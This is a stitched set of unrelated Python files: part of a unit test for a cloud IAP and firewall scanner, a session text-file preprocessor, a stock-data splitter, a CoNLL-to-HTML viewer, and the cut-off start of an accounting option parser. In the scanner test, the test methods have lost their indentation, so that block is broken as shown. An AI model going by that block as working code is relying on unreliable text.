            'network': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='network',
                firewall_rule_network='global/networks/social',
                firewall_rule_source_tags=json.dumps(['network']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'tcp',
                }]),
            ),
            # Doesn't apply because of tags.
            'tag_mismatch': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='tag_mismatch',
                firewall_rule_network='global/networks/default',
                firewall_rule_source_tags=json.dumps(['tag_mismatch']),
                firewall_rule_target_tags=json.dumps(['im_gonna_pop_some_tags']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'tcp',
                }]),
            ),
            # Tag-specific rule *does* apply.
            'tag_match': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='tag_match',
                firewall_rule_network='global/networks/default',
                firewall_rule_source_tags=json.dumps(['tag_match']),
                firewall_rule_target_tags=json.dumps(['tag_i1']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'tcp',
                }]),
            ),
            # Preempted by deny rule.
            'preempted': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='preempted',
                firewall_rule_network='global/networks/default',
                firewall_rule_source_tags=json.dumps(['preempted']),
                firewall_rule_allowed=json.dumps([{
                    'IPProtocol': 'tcp',
                }]),
            ),
            # Preempted by deny rule.
            'preempted_deny': firewall_rule_type.FirewallRule(
                project_id='foo',
                firewall_rule_name='preempted_deny',
                firewall_rule_priority=1,
                firewall_rule_network='global/networks/default',
                firewall_rule_source_ranges=json.dumps(['preempted']),
                firewall_rule_denied=json.dumps([{
                    'IPProtocol': 'tcp',
                }]),
            ),
        }
        self.instances = {
            'i1': instance_type.Instance(
                project_id='foo',
                name='i1',
                tags=json.dumps({'items': ['tag_i1']}),
                zone='wl-redqueen1-a',
            ),
            'i2': instance_type.Instance(
                project_id='foo',
                name='i2',
                tags=json.dumps([]),
                zone='wl-redqueen1-a',
            ),
        }
        self.instance_groups = {
            # Managed
            'ig_managed': instance_group_type.InstanceGroup(
                project_id='foo',
                name='ig_managed',
                network='global/networks/default',
                region='wl-redqueen1',
                instance_urls=json.dumps(
                    [('https://www.googleapis.com/compute/v1/'
                      'projects/foo/zones/wl-redqueen1-a/instances/i1')]),
            ),
            # Unmanaged; overrides port mapping
            'ig_unmanaged': instance_group_type.InstanceGroup(
                project_id='foo',
                name='ig_unmanaged',
                network='global/networks/default',
                region='wl-redqueen1',
                instance_urls=json.dumps([]),
                named_ports=json.dumps(
                    [{'name': 'foo', 'port': 80},
                     {'name': 'http', 'port': 8080}]),
            ),
            # Unmanaged; same instance as ig_managed
            'ig_same_instance': instance_group_type.InstanceGroup(
                project_id='foo',
                name='ig_same_instance',
                network='global/networks/default',
                region='wl-redqueen1',
                instance_urls=json.dumps(
                    [('https://www.googleapis.com/compute/v1/'
                      'projects/foo/zones/wl-redqueen1-a/instances/i1')]),
            ),
            # Unmanaged; different network than ig_managed
            'ig_different_network': instance_group_type.InstanceGroup(
                project_id='foo',
                name='ig_different_network',
                network='global/networks/nondefault',
                region='wl-redqueen1',
                instance_urls=json.dumps(
                    [('https://www.googleapis.com/compute/v1/'
                      'projects/foo/zones/wl-redqueen1-a/instances/i1')]),
            ),
            # Unmanaged; different instance than ig_managed
            # NOTE(review): dict key is 'ig_different_instance' but the
            # resource name is 'ig5' -- confirm the mismatch is intentional.
            'ig_different_instance': instance_group_type.InstanceGroup(
                project_id='foo',
                name='ig5',
                network='global/networks/default',
                region='wl-redqueen1',
                instance_urls=json.dumps(
                    [('https://www.googleapis.com/compute/v1/'
                      'projects/foo/zones/wl-redqueen1-a/instances/i2')]),
            ),
        }
        self.instance_group_managers = {
            'igm1': instance_group_manager_type.InstanceGroupManager(
                project_id='foo',
                name='igm1',
                instance_group=('https://www.googleapis.com/compute/v1/'
                                'projects/foo/regions/wl-redqueen1/instanceGroups/ig_managed'),
                instance_template=('https://www.googleapis.com/compute/v1/'
                                   'projects/foo/global/instanceTemplates/it1'),
                region='wl-redqueen1',
            ),
        }
        self.instance_templates = {
            'it1': instance_template_type.InstanceTemplate(
                project_id='foo',
                name='it1',
                properties=json.dumps({
                    'tags': {'items': ['tag_it1']},
                }),
            ),
        }
        # Snapshot of all fixtures, as the scanner's run-time view.
        self.data = iap_scanner._RunData(self.backend_services.values(),
                                         self.firewall_rules.values(),
                                         self.instances.values(),
                                         self.instance_groups.values(),
                                         self.instance_group_managers.values(),
                                         self.instance_templates.values(),
                                         )
def test_instance_template_map(self):
self.assertEqual(
{
self.instance_groups['ig_managed'].key: self.instance_templates['it1'],
},
self.data.instance_templates_by_group_key)
def test_find_instance_group(self):
self.assertEqual(self.instance_groups['ig_managed'],
self.data.find_instance_group_by_url(
'https://www.googleapis.com/compute/v1/'
'projects/foo/regions/wl-redqueen1/instanceGroups/ig_managed'))
def test_find_instance(self):
self.assertEqual(self.instances['i1'],
self.data.find_instance_by_url(
'https://www.googleapis.com/compute/v1/'
'projects/foo/zones/wl-redqueen1-a/instances/i1'))
def test_find_network_port(self):
self.assertEqual(
self.network_port(80),
self.data.instance_group_network_port(
self.backend_services['bs1'], self.instance_groups['ig_managed']))
# ig_unmanaged overrides port mapping, so it gets a different port number
self.assertEqual(
self.network_port(8080),
self.data.instance_group_network_port(
self.backend_services['bs1'], self.instance_groups['ig_unmanaged']))
def test_firewall_allowed_sources(self):
self.assertEqual(
set(['10.0.2.0/24', 'tag_match', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(80), 'tag_i1'))
self.assertEqual(
set(['10.0.2.0/24', 'tag_match', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(81), 'tag_i1'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(80), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(8079), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all', 'applies_8080']),
self.data.firewall_allowed_sources(self.network_port(8080), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all', 'applies_8081_8083']),
self.data.firewall_allowed_sources(self.network_port(8081), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all', 'applies_8081_8083']),
self.data.firewall_allowed_sources(self.network_port(8082), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all', 'applies_8081_8083']),
self.data.firewall_allowed_sources(self.network_port(8083), 'tag'))
self.assertEqual(
set(['10.0.2.0/24', 'applies_all']),
self.data.firewall_allowed_sources(self.network_port(8084), 'tag'))
def test_tags_for_instance_group(self):
self.assertEqual(
set(['tag_i1', 'tag_it1']),
self.data.tags_for_instance_group(self.instance_groups['ig_managed']))
self.assertEqual(
set(),
self.data.tags_for_instance_group(self.instance_groups['ig_unmanaged']))
def test_retrieve_resources(self):
iap_resources = dict((resource.backend_service.key, resource)
for resource in self.scanner._retrieve()[0])
self.maxDiff = None
self.assertEquals(set([bs.key for bs in self.backend_services.values()]),
set(iap_resources.keys()))
self.assertEquals(
iap_scanner.IapResource(
backend_service=self.backend_services['bs1'],
alternate_services=set([
backend_service_type.Key.from_args(
project_id='foo',
name='bs1_same_backend',
),
backend_service_type.Key.from_args(
project_id='foo',
name='bs1_same_instance',
),
]),
direct_access_sources=set(['10.0.2.0/24',
'tag_match',
'applies_all',
'applies_8080']),
iap_enabled=True,
),
iap_resources[self.backend_services['bs1'].key])
@mock.patch(
'google.cloud.security.scanner.scanners.iap_scanner.datetime',
autospec=True)
@mock.patch(
'google.cloud.security.scanner.scanners.iap_scanner.notifier',
autospec=True)
@mock.patch.object(
iap_scanner.IapScanner,
'_upload_csv', autospec=True)
@mock.patch.object(
iap_scanner.csv_writer,
'write_csv', autospec=True)
@mock.patch.object(
iap_scanner.IapScanner,
'_output_results_to_db', autospec=True)
def test_run_scanner(self, mock_output_results, mock_csv_writer,
mock_upload_csv, mock_notifier, mock_datetime):
mock_datetime.utcnow = mock.MagicMock()
mock_datetime.utcnow.return_value = self.fake_utcnow
fake_csv_name = 'fake.csv'
fake_csv_file = type(
mock_csv_writer.return_value.__enter__.return_value)
fake_csv_file.name = fake_csv_name
self.scanner.run()
self.assertEquals(1, mock_output_results.call_count)
mock_upload_csv.assert_called_once_with(
self.scanner,
self.fake_scanner_configs.get('output_path'),
self.fake_utcnow,
fake_csv_name)
mock_csv_writer.assert_called_once_with(
data=[{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_different_port',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_different_network',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'False',
'resource_name': 'bs1',
'alternate_services_violations': (
'foo/bs1_same_backend, foo/bs1_same_instance'),
'direct_access_sources_violations': (
'10.0.2.0/24, '
'applies_8080, '
'applies_all, '
'tag_match')},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_different_instance',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_same_backend',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'},
{'resource_id': None,
'rule_name': 'test',
'rule_index': 0,
'violation_data': {
'iap_enabled_violation': 'True',
'resource_name': 'bs1_same_instance',
'alternate_services_violations': '',
'direct_access_sources_violations': ''},
'violation_type': 'IAP_VIOLATION',
'resource_type': 'backend_service'}],
resource_name='violations',
write_header=True)
self.assertEquals(0, mock_notifier.process.call_count)
# Allow running this test module directly.
if __name__ == '__main__':
    unittest.main()
|
"""Class holding all attributes related to preprocessing textFiles"""
# Change working directory to where this module is before doing anything else
import os, sys
os.chdir(os.path.dirname(os.path.abspath(sys.argv[0])))
import cfg
import os
import csv
import numpy as np
import collections
from datetime import datetime
import itertools
import csv
class PreprocessTextfiles:
    """Imports, deduplicates, sorts, and bins the lines of session text files.

    All configuration (directories, column indices, bin size, output
    location) comes from the project-local ``cfg`` module.
    """

    # String constants that mark session boundaries inside a textfile.
    seshStart_str = 'SeshStart'
    seshEnd_str = 'SeshEnd'
    seshStartTag_str = '0000000000'
    seshEndTag_str = '0000000000'

    def __init__(self):
        self.binned_lines = None
        # texts_not_imported = [col_condition, row_condition, absolute_start_condition]
        self.texts_not_imported = None
        self.txt_list = self.get_all_text_locs()
        self.all_lines = self.get_all_lines_no_dupes(self.txt_list)
        zipped = self.import_texts_to_list_of_mat(self.txt_list)
        # list(...) keeps this working on both Python 2 and 3 (zip() returns
        # a non-indexable iterator on Python 3); same result on Python 2.
        self.texts_imported = list(zip(*zipped))[1]
        # Sort all imported lines chronologically.
        times = self.get_col(self.all_lines, cfg.TIME_COL)
        self.all_lines = self.sort_X_BasedOn_Y_BeingSorted(self.all_lines, times)
        # if an output_dir was specified, output a csv to it
        self.output_all_lines_to_csv()

    def output_all_lines_to_csv(self):
        """Output all imported lines to a single csv in cfg.OUTPUT_LOC."""
        # NOTE(review): the "wb" mode and the backslash separator are
        # Windows / Python 2 conventions; on Python 3 csv output needs
        # mode "w" with newline='' -- confirm the target interpreter.
        with open(cfg.OUTPUT_LOC + "\\all_lines.csv", "wb") as f:
            writer = csv.writer(f)
            writer.writerows(self.all_lines)

    def sort_X_BasedOn_Y_BeingSorted(self, X, Y):
        """Return X (as an np.array) reordered by the sort order of Y."""
        X = np.array(X)
        Y = np.array(Y)
        inds = Y.argsort()
        return X[inds]

    def get_col(self, list_of_lists, col_num):
        """Return the desired column from a list of lists, as a list."""
        return list(np.asarray(list_of_lists)[:, col_num])

    def get_all_text_locs(self):
        """Return paths of all .txt files under cfg.DIR_WITH_TEXTFILES,
        excluding any path inside one of cfg.FOLDERS_TO_IGNORE."""
        txt_list = []
        for root, dirs, files in os.walk(cfg.DIR_WITH_TEXTFILES):
            for file in files:
                if file.endswith(".txt"):
                    print(os.path.join(root, file))
                    txt_list.append(os.path.join(root, file))
        # Remove all the paths that are subdirectories of the ignore folders
        for folder in cfg.FOLDERS_TO_IGNORE:
            txt_list = [x for x in txt_list if folder not in x]
        return txt_list

    def import_texts_to_list_of_mat(self, txtList):
        """Import viable text files into a list of line matrices.

        Returns:
            list of (lines_list, text_file_loc) tuples, sorted by each
            file's session start time, where lines_list is one file's
            lines as a 2D list and text_file_loc is its path.

        Files are skipped (and recorded in self.texts_not_imported) when
        they start before cfg.ABSOLUTE_START_TIME, have too few rows or no
        leading SeshStart row, or raise while being parsed (malformed
        columns).
        """
        lines_list = []
        text_file_loc = []
        texts_not_imported_col_condition = []
        texts_not_imported_row_condition = []
        texts_not_imported_absolute_start_condition = []
        # Append them all into one matrix (the ones with the appropriate number of columns)
        for i in range(len(txtList)):
            text_file = txtList[i]
            try:
                with open(text_file) as f:
                    reader = csv.reader(f, delimiter="\t")
                    new_lines = list(reader)
                print(str(len(new_lines)) + " - " + text_file)
                # Don't consider textfiles before specfied time
                text_start_date = datetime.strptime(
                    new_lines[0][cfg.DATE_COL], '%Y-%m-%d %H:%M:%S.%f')
                if text_start_date > cfg.ABSOLUTE_START_TIME:
                    # Only consider textFile with more than 2 rows and that have 'SeshStart' in first line
                    if len(new_lines) > 2 and new_lines[0][cfg.ACTION_COL] == self.seshStart_str:
                        # Add a row for textFiles missing a SeshEnd
                        if new_lines[-1][cfg.ACTION_COL] != self.seshEnd_str:
                            new_lines.append(new_lines[-1][:])
                            new_lines[-1][cfg.ACTION_COL] = self.seshEnd_str
                            new_lines[-1][cfg.TAG_COL] = self.seshEndTag_str
                        lines_list.append(new_lines)
                        text_file_loc.append(txtList[i])
                    else:
                        print("Text file does not have enough rows - " + text_file)
                        texts_not_imported_row_condition.append(text_file)
                else:
                    print("Text file was taken too early - " + text_file)
                    texts_not_imported_absolute_start_condition.append(text_file)
            except Exception:
                # Malformed files raise while being parsed above; record and
                # skip them.  (Was `except BaseException`, which also
                # swallowed KeyboardInterrupt/SystemExit.)
                print("Text file does not have enough columns - " + text_file)
                texts_not_imported_col_condition.append(text_file)
        self.texts_not_imported = [texts_not_imported_col_condition,
                                   texts_not_imported_row_condition,
                                   texts_not_imported_absolute_start_condition]
        # Sort the text file contents and names by session start times.
        startSeshes = [lines[0][cfg.TIME_COL] for lines in lines_list]
        print(startSeshes[0:5])
        print(text_file_loc[0:5])
        print(lines_list[0:5])
        text_file_loc = self.sort_X_BasedOn_Y_BeingSorted(text_file_loc, startSeshes)
        lines_list = self.sort_X_BasedOn_Y_BeingSorted(lines_list, startSeshes)
        print(text_file_loc[0:5])
        print(lines_list[0:5])
        return list(zip(lines_list, text_file_loc))

    def get_all_lines_no_dupes(self, txt_list):
        """Return all lines from all files in txt_list, duplicates removed."""
        list_of_Mat = self.import_texts_to_list_of_mat(txt_list)
        lines_list = list(zip(*list_of_Mat))[0]
        lines_list = list(itertools.chain.from_iterable(lines_list))
        # Dedupe by converting rows to hashable tuples; order is not
        # preserved here -- __init__ re-sorts by time afterwards.
        lines_list = [list(x) for x in set(tuple(x) for x in lines_list)]
        return lines_list

    def eAnd(self, *args):
        """Element-wise 'and' across the given equal-length sequences."""
        # Loop variable renamed from `tuple`, which shadowed the builtin.
        return [all(items) for items in zip(*args)]

    def set_bins(self):
        """Bin the sorted all_lines into consecutive cfg.BIN_TIME windows.

        For your convenience: there are 86400 seconds in a day.
        Sets self.binned_lines to a list of np.arrays, one per bin; the
        first line of each bin is BIN_TIME seconds before the last.
        """
        all_lines = self.all_lines
        column_of_times = self.get_col(all_lines, cfg.TIME_COL)
        column_of_times = np.array([float(x) for x in column_of_times])
        all_lines = np.array(all_lines)
        binned_lines = []
        start_ind = column_of_times[0]
        end_ind = start_ind + cfg.BIN_TIME
        while end_ind <= column_of_times[-1]:
            mask = np.array(self.eAnd(column_of_times >= start_ind,
                                      column_of_times < end_ind))
            binned_lines.append(all_lines[mask])
            # Log the bin that was just created.  (The original printed
            # after incrementing, so it reported the *next* bin's bounds.)
            print('bin created from ' + str(start_ind) + ' to ' + str(end_ind))
            start_ind = end_ind
            end_ind = end_ind + cfg.BIN_TIME
        self.binned_lines = binned_lines

    def get_col_binned_lines(self, binned_lines, col_num):
        """Return the given column of each non-empty bin, as a list of lists."""
        if self.binned_lines is None:
            # The original used `assert(1==0, msg)`, which asserts a
            # non-empty tuple and therefore never fires; raise explicitly.
            raise ValueError('binned_lines have not been set')
        binned_lines_col = []
        for lines_list in binned_lines:
            if len(lines_list) > 0:
                binned_lines_col.append(self.get_col(lines_list, col_num))
        return binned_lines_col

    def get_binned_rows_tag(self, binned_lines, chosen_tags):
        """Return, per bin, only the lines whose tag is in chosen_tags."""
        if self.binned_lines is None:
            raise ValueError('binned_lines have not been set')
        binned_lines_tags = []
        for lines_list in binned_lines:
            the_bin = [line for line in lines_list
                       if int(line[cfg.TAG_COL]) in chosen_tags]
            binned_lines_tags.append(the_bin)
        return binned_lines_tags

    def get_freq_list_binned(self, binned_lines, item, col_num):
        """Return, per bin, the count of occurrences of item in column col_num."""
        if self.binned_lines is None:
            raise ValueError('binned_lines have not been set')
        chosen_col = self.get_col_binned_lines(binned_lines, col_num)
        return [its.count(item) for its in chosen_col]

    def find_freqs_for_each(self, item, col_num, chosen_tags):
        """Return, per bin, the per-tag counts of item in column col_num."""
        if self.binned_lines is None:
            raise ValueError('binned_lines have not been set')
        freqs_for_each = []
        for lines_list in self.binned_lines:
            freqs_for_bin = []
            for tag in chosen_tags:
                tag_rows_bin = self.get_binned_rows_tag([lines_list], [tag])
                if len(tag_rows_bin[0]) == 0:
                    freqs_for_bin.append(0)
                else:
                    freqs_for_bin.append(
                        self.get_freq_list_binned(tag_rows_bin, item, col_num)[0])
            freqs_for_each.append(freqs_for_bin)
        return freqs_for_each
#test = PreprocessTextfiles()
# def setDuplicates(self,lines_list,textFileLoc):
# """Return a tuple of text file locations and their startSeshes that have been identified as duplicates,
# ordered by StartSesh"""
# # Remove the text files that have the same start time as another
# startSeshes = []
# for i in range(len(lines_list)):
# startSeshes.append(lines_list[i][0][self.timeCol])
#
# def equalToAnother(elem):
# return (startSeshes.count(elem) > 1)
#
# def NOTequalToAnother(elem):
# return (startSeshes.count(elem) == 1)
#
# # Indices of all text files that are duplicates of another and those that are unique
# equalStartInd=map(equalToAnother,startSeshes)
# notEqualStartInd = map(NOTequalToAnother, startSeshes)
#
# # Retrieve text file names and start times that have duplicates
# textFileEquals=np.asarray(textFileLoc)[np.asarray(equalStartInd)]
# startTimeEquals=np.asarray(startSeshes)[np.asarray(equalStartInd)]
#
# # Sort these text files by start time
# textFileEquals = self.sort_X_BasedOn_Y_BeingSorted(textFileEquals,startTimeEquals)
# startTimeEquals = self.sort_X_BasedOn_Y_BeingSorted(startTimeEquals,startTimeEquals)
#
# self.duplicates = zip(textFileEquals,startTimeEquals)
#
# def setDuplicatesThatWereKept(self):
# if self.duplicates == None:
# assert(1==0,'No duplicates have been set')
# textFileEquals = zip(*self.duplicates)[0]
# startTimeEquals = zip(*self.duplicates)[1]
#
# textFileEqualsOnlyOne = [] # you are the only one baby!
# startTimeEqualsOnlyOne = []
# # Create a list that only contains one (any one) of the textFiles that have a duplicate
# for i in range(len(startTimeEquals)):
# if i != range(len(startTimeEquals))[-1]:
# if startTimeEquals[i] != startTimeEquals[i+1]:
# startTimeEqualsOnlyOne.append(startTimeEquals[i])
# textFileEqualsOnlyOne.append(textFileEquals[i])
# else:
# startTimeEqualsOnlyOne.append(startTimeEquals[i])
# textFileEqualsOnlyOne.append(textFileEquals[i])
#
# self.duplicatesKept = zip(textFileEqualsOnlyOne,startTimeEqualsOnlyOne)
#
#
# def importTextsToDict(self,txtList):
# """
# Return a dictionary that has each path of each text file as the key to a matrix that contains all the lines_list of each text file
# - duplicates removed, ordered by textFile startseshes
# """
# workingDir = self.workingDir
# txtList = self.getAllTextLocs(workingDir)
# # Remove all the paths that are subdirectories of the ignore folders
# for i in range(len(self.foldersToIgnore)):
# txtList=[x for x in txtList if not (self.foldersToIgnore[i] in x)]
#
# # lines_list contains the lines_list from each text file where lines_list[i] contains all the lines_list of the i'th text file
# ListofMat=self.importTextsToListofMat(txtList)
# lines_list = zip(*ListofMat)[0]
# textFileLoc = zip(*ListofMat)[1]
#
# if self.duplicates == None:
# self.setDuplicates(lines_list,textFileLoc)
# self.setDuplicatesThatWereKept()
#
# ######
# ## Remove the text files that have the same start time as another
# #startSeshes = []
# #for i in range(len(lines_list)):
# # startSeshes.append(lines_list[i][0][self.timeCol])
# #
# #def equalToAnother(elem):
# # return (startSeshes.count(elem) > 1)
# #
# #def NOTequalToAnother(elem):
# # return (startSeshes.count(elem) == 1)
# #
# ## Indices of all text files that are duplicates of another and those that are unique
# #equalStartInd=map(equalToAnother,startSeshes)
# #notEqualStartInd = map(NOTequalToAnother, startSeshes)
# #
# ## Retrieve text file names and start times that have duplicates
# #textFileEquals=np.asarray(textFileLoc)[np.asarray(equalStartInd)]
# #startTimeEquals=np.asarray(startSeshes)[np.asarray(equalStartInd)]
# #
# #
# ## Sort these text files by start time
# #textFileEquals = self.sort_X_BasedOn_Y_BeingSorted(textFileEquals,startTimeEquals)
# #startTimeEquals = self.sort_X_BasedOn_Y_BeingSorted(startTimeEquals,startTimeEquals)
# ######
#
# #textFileEqualsOnlyOne = [] # you are the only one baby!
# #startTimeEqualsOnlyOne = []
# ## Create a list that only contains one (any one) of the textFiles that have a duplicate
# #for i in range(len(startTimeEquals)):
# # if i != range(len(startTimeEquals))[-1]:
# # if startTimeEquals[i] != startTimeEquals[i+1]:
# # startTimeEqualsOnlyOne.append(startTimeEquals[i])
# # textFileEqualsOnlyOne.append(textFileEquals[i])
# # else:
# # startTimeEqualsOnlyOne.append(startTimeEquals[i])
# # textFileEqualsOnlyOne.append(textFileEquals[i])
#
#
# #notEqualStartInd = map(NOTequalToAnother, startSeshes)
#
#
# ###
# # Remove all the text files that have a duplicate (another text file with identical startSesh)
# # notEqualStartInd - indices of all text files that have unique startSeshes
# #lines_list = np.asarray(lines_list)[np.asarray(notEqualStartInd)]
# #lines_list = lines_list.tolist()
# #textFileLoc = np.asarray(textFileLoc)[np.asarray(notEqualStartInd)]
# #textFileLoc = textFileLoc.tolist()
# #startSeshes = np.asarray(startSeshes)[np.asarray(notEqualStartInd)]
# #startSeshes = startSeshes.tolist()
# ###
#
# # Remove all the text files that have a duplicate (another text file with identical startSesh)
# textFileEquals = zip(*self.duplicates)[0]
# startTimeEquals = zip(*self.duplicates)[1]
# lines_list = [line for line in lines_list if line[0][self.timeCol] in startTimeEquals]
# textFileLoc = [textF for textF in textFileLoc if textF in textFileEquals]
#
# assert(len(lines_list)==len(textFileLoc))
#
#
# # Right, and now add only one of each of the duplicates back to 'lines_list'
# #[linesOneDup,textFileLocOneDup]=importTextsToListofMat(textFileEqualsOnlyOne)
# textFileEqualsOnlyOne = zip(*self.duplicatesKept)[0]
# ListofMat=self.importTextsToListofMat(textFileEqualsOnlyOne)
# linesOneDup = zip(*ListofMat)[0]
# textFileLocOneDup = zip(*ListofMat)[1]
#
# for linesToAdd in linesOneDup:
# lines_list.append(linesToAdd)
# for locToAdd in textFileLocOneDup:
# textFileLoc.append(locToAdd)
#
# # Sort the text file contents and names by startSeshes
# startSeshes = []
# for i in range(len(lines_list)):
# startSeshes.append(lines_list[i][0][self.timeCol])
# textFileLoc = self.sort_X_BasedOn_Y_BeingSorted(textFileLoc,startSeshes)
# lines_list = self.sort_X_BasedOn_Y_BeingSorted(lines_list,startSeshes)
#
# # Add these two to a dictionary
# textDict = collections.OrderedDict(zip(textFileLoc, lines_list))
# return textDict
#
#
#
#
# def convertToUsefulDate(self,DateList):
# """returns a list of dates converted to date objects"""
# DateList_pr = DateList[:]
# # Convert dates to date objects that are useable
# for i in range(len(DateList_pr)):
# DateList_pr[i]=(datetime.strptime(DateList[i], '%Y-%m-%d %H:%M:%S.%f'))
# return DateList_pr
#
#
#
|
import csv
import os
import z
import update_history
def setlistofstocks():
    """Persist (via z.setp) the list of stock symbols found in the
    historical-data directory -- one symbol per csv file name."""
    path = z.getPath("historical")
    stocks = [os.path.splitext(entry)[0] for entry in os.listdir(path)]
    z.setp(stocks, "listofstocks")
def process(astock, path):
    """Split one stock's historical csv at *path* into per-year csv files.

    Output goes to split/<first letter>/<stock>_<year>.csv.  Rows are
    assumed to be grouped by year (a new output file is started whenever
    the year changes).  The original leaked every file handle it opened;
    handles are now closed deterministically.
    """
    print("astock : {}".format( astock ))
    cyear = None
    out = None
    writer = None
    try:
        with open(path) as src:
            reader = csv.DictReader(src)
            for row in reader:
                year = row['Date'].split("-")[0]
                if cyear != year:
                    # New year: close the previous year's file, open the next.
                    if out is not None:
                        out.close()
                    tpath = z.getPath("split/{}/{}_{}.csv".format(astock[0], astock, year))
                    out = open(tpath, "w")
                    writer = csv.DictWriter(out, fieldnames=reader.fieldnames)
                    writer.writeheader()
                    cyear = year
                writer.writerow(row)
    finally:
        if out is not None:
            out.close()
def num_of_days_checks():
    """Print every stock whose csv has fewer than 218 data rows."""
    stocks = z.getp("listofstocks")
    for astock in stocks:
        path = z.getCsvPath(astock)
        # `with` closes the handle deterministically (the original leaked it);
        # sum() counts the rows without keeping them.
        with open(path) as f:
            i = sum(1 for row in csv.DictReader(f))
        if i < 218:
            print("astock: {} {} ".format( astock, i))
def listofs():
    """Persist (via z.setp) every stock that is not an ETF, under 'listofs'."""
    stocks = z.getp("listofstocks")
    etfs = z.getEtfList()
    # Local renamed: the original shadowed this function's own name.
    non_etfs = [astock for astock in stocks if astock not in etfs]
    z.setp(non_etfs, "listofs")
#listofs()
#exit()
if __name__ == '__main__':
    # Re-download and append recent history for a hand-maintained list of
    # problem tickers, then rebuild the derived datasets.
    # problems = z.getp("problems")
    problems = []
    for astock in problems:
        if astock == "BRKB":
            continue
        df = update_history.getDataFromYahoo(astock, "2013-01-02")
        if df is None:
            # Download failed; report and move on.
            print("astock : {}".format( astock ))
            continue
        path = z.getPath("historical/{}.csv".format(astock))
        # Append each downloaded row to the stock's historical csv.
        with open(path, "a") as f:
            for i,idx in enumerate(df.index):
                if i == 0:
                    f.write("Date,Open,High,Low,Close,Adj Close,Volume\n")
                cdate = str(idx.to_pydatetime()).split(" ")[0]
                opend = df.at[idx, "Open"]
                high = df.at[idx, "High"]
                low = df.at[idx, "Low"]
                closed = df.at[idx, "Close"]
                adj = df.at[idx, "Adj Close"]
                vol = df.at[idx, "Volume"]
                added = True  # NOTE(review): never read afterwards -- dead store?
                f.write("{},{},{},{},{},{},{}\n".format(cdate, opend, high, low, closed, adj, vol))
        print("path : {}".format( path ))
        process(astock, path)
    setlistofstocks()
    # Rebuild downstream datasets; imports are deferred so the heavy modules
    # only load when this script runs directly.
    import prob_down_5_years
    prob_down_5_years.prob()
    import gained_discount
    gained_discount.dosomething()
    gained_discount.genUlt()
    # num_of_days_checks()
    # path = z.getPath("historical/KO.csv")
    # process("KO", path)
|
import argparse
import pyconll
# Static HTML scaffolding: sentences are emitted between these two parts.
# Tokens tagged C render red, E blue (see the CSS classes below).
document_start = """
<html>
<head>
<style>
.C {color:red;}
.E {color:blue;}
.sent {border: 1px solid; margin-bottom:10px}
</style>
</head>
<body>"""

document_end = """
</body>
</html>"""
def read_conll(file_name):
    """Load a CoNLL file and wrap each token in a <span> styled by its UPOS.

    Tokens whose UPOS is 'C' or 'E' keep that class name; anything else is
    rendered with class 'O'.  Returns a list of sentences, each a list of
    HTML span strings.
    """
    # Local import keeps this module's import block untouched; escaping the
    # token text prevents characters like < > & from breaking the markup.
    import html

    data = pyconll.load_from_file(file_name)
    tags = [
        [
            "<span class='"
            + (token.upos if token.upos in ["C", "E"] else "O")
            + "'>" + html.escape(token.form) + "</span>"
            for token in sent
        ]
        for sent in data
    ]
    return tags
if __name__ == '__main__':
    # Render gold vs. predicted CoNLL annotations side by side as HTML.
    parser = argparse.ArgumentParser()
    parser.add_argument('-g', type=str, dest="gold", required=True, help= 'gold filename')
    parser.add_argument('-p', type=str, dest="pred", required=True, help= 'predicted filename')
    parser.add_argument('-o', type=str, dest="out", required=True, help= 'output html')
    args = parser.parse_args()
    gold = read_conll(args.gold)
    pred = read_conll(args.pred)
    document = document_start
    # One bordered block per sentence: first row gold, second row predicted.
    for g_s, p_s in zip(gold, pred):
        document += "<div class='sent'>"
        document += "<div>" + " ".join(g_s) + "</div>"
        document += "<div>" + " ".join(p_s) + "</div>"
        document += "</div>"
    document += document_end
    with open(args.out, "w") as f:
        f.write(document)
|
#!/usr/bin/python
import exceptions
import getopt
import sys
from wnodes import accounting
from wnodes.accounting import usage
from wnodes.accounting import record_format
from wnodes.accounting import message_format
from wnodes.accounting import requests
class ParsingError(exceptions.Exception):
    """Raised when an unrecognized command-line option is encountered."""
    pass
class InputError(exceptions.Exception):
    """Raised when required input parameters are missing or empty."""
    pass
class Parser(object):
    """Parses command-line options into the accounting parameters dict.

    NOTE: this module uses Python 2 syntax (``except ..., err``) and
    targets a Python 2 interpreter.
    """
    def __init__(self):
        # Defaults; SiteName is mandatory and validated in
